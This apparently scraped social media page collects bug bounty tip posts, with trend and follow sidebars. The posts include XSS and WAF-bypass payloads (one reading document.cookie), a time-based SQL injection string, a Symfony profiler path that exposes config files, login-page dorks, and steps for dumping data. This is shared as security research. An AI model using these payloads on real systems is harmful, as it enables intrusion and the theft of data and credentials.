Similar User
@RahmatQurishi
@gonzxph
@siratsami71
@basu_banakar
@Justin85563950
@saajanbhujel
@munna0x1
@0xm1racle
@itsz4x
@ArjunSingh27586
@proviesec
@MBlacksolo
@ak_bruster
@tharunsai0039
@Rmyada1
*XSS* "></ : [filtered] <img> <iframe>tags : [filtered] "<> : [filtered] HTML entity: <a href=javascript:alert(1)>click : filtered (javascript:alert) : [filtered] Final payload: "aaa<a href=javas&#99;ript:alert(1)>click" 🫡🧙♂️ #bugbounty #xss
Bypassed strong Akamai WAF of Usa Department of Justice payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
If you find Web frameworks like Symfony, add '/app_dev.php/_profiler/open?file=app/config/parameters.yml' to the wordlist, and you may get juicy data. Enjoy!" #bugbountytips #bugbountytip #cybersecurity #ethicalhacking
Two P3 after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. Payload: ⚙️ "%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e" credit: @nav1n0x #bugbountytips #BugBounty
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite medium.com/@h4x0r_dz/2300… credit: @h4x0r_dz #bugbountytips #bugbounty
Acqhunt: An acquisition grabber in bug bounty hunting. Developed in Golang, it optimizes and elevates your bug hunting journey
The writeup is ready 📝 (Subdomain Fuzzing worth 35k bounty!) 💰 I tried my best to make everything clear, and useful ✨ Enjoy 😊 credit: @XHackerx007 #bugbountytips #Hacking medium.com/@HX007/subdoma…
Sql Injection Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #bugbountytips #BugBounty #SqlInjection
I just published 0 Click Account TakeOver + Steal MFA Token and party! link.medium.com/jf4tCk9DiJb
I got a bounty too #bugbountytips
Don't forget to add Release.zip to your wordlist, you can't imagine what can happen. #BugBounty #SensitiveDataExposure
The Complete Ethical Hacking Course Beginner to Advanced... "🔐 Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced'! 🚀 Uncover the secrets of cybersecurity, master penetration testing, and become a pro ethical hacker. 💻🛡️ Join the cybersecurity…
🤔Many people have often asked me how to search for "ivanti", for shodan you can search as title:"Ivanti Connect" hostname:"target.*" credit: @ynsmroztas #bugbountytip #bugbounty
Tips for JS file enum for endpoints /Juicy info ... ** - download js files of the target Ex : wget link_to_js ** - use beautifier.io to easy read js file contents ** - i got extra endpoints to check for :) #bugbountytips
Finally i fixed the problem, Solution: i need to fuzz with user agent they block ffuf UA ffuf -u https://test/.com/FUZZ -w wordlist .txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Guys why when i fuzz some websites they don’t give me any results but I’m sure they should give me results for some paths I already see it, there’s no waf in Application what should i do & why this happened?
Check out my new blog post: Port Scanning for Bug Bounties buff.ly/44bQPC9 #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass buff.ly/4b1S5u0 Such a great read by: @pmnh_ & @UsmanMansha420 #bugbounty #hacking #cybersecurity #bugbountytips
i uploaded the template to a github repo and will upload other templates when i create new ones github.com/rzizah/private…
Google Dork - Login Pages 🔑 inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels 👀
10 bsqli in 15 mins ⏳ and nearly 2 hour to dumb data and confirm 1- i set upped my bsqli payload using nuclei 2- used custom google dorks for params found success with it on the same program 3- gathered all links and run my tempelate on them 4- dumbed the data using ghauri
Easy information disclosure 1- chose wide scope target 2- gather root domains 3- use gau or waymore > you can use --subs to also get subs 4- filter js files and search for api_keys you can use mantra or nuclei exposure temp #BugBounty #bugbountytips
United States Trends
- 1. McDonald 55,1 B posts
- 2. #AskFFT 1.085 posts
- 3. Mike Johnson 57,7 B posts
- 4. #RollWithUs N/A
- 5. Go Bills 5.589 posts
- 6. #sundayvibes 9.168 posts
- 7. Good Sunday 75,2 B posts
- 8. Big Mac 6.228 posts
- 9. Tillman 2.293 posts
- 10. Coke 34,4 B posts
- 11. #GoPackGo 1.058 posts
- 12. Full PPR N/A
- 13. #AskZB N/A
- 14. Kittle 1.660 posts
- 15. Chubb 1.375 posts
- 16. Happy Founders 1.147 posts
- 17. Shakir 2.121 posts
- 18. Mooney 4.274 posts
- 19. Estime 4.256 posts
- 20. Jennings 5.700 posts
Who to follow
-
Rahmat Qurishi
@RahmatQurishi -
Jefferson Gonzales
@gonzxph -
Sirat Sami (analyz3r)
@siratsami71 -
Basavaraj Banakar🇮🇳
@basu_banakar -
JustinBmz
@Justin85563950 -
Saajan Bhujel ❄
@saajanbhujel -
S.M Munna
@munna0x1 -
0xm1racle
@0xm1racle -
zax
@itsz4x -
Arjun Singh
@ArjunSingh27586 -
Proviesec
@proviesec -
Blacksolo , Sp00f3dByt3
@MBlacksolo -
Manik Koirala
@ak_bruster -
tharun
@tharunsai0039 -
YADA
@Rmyada1
Something went wrong.
Something went wrong.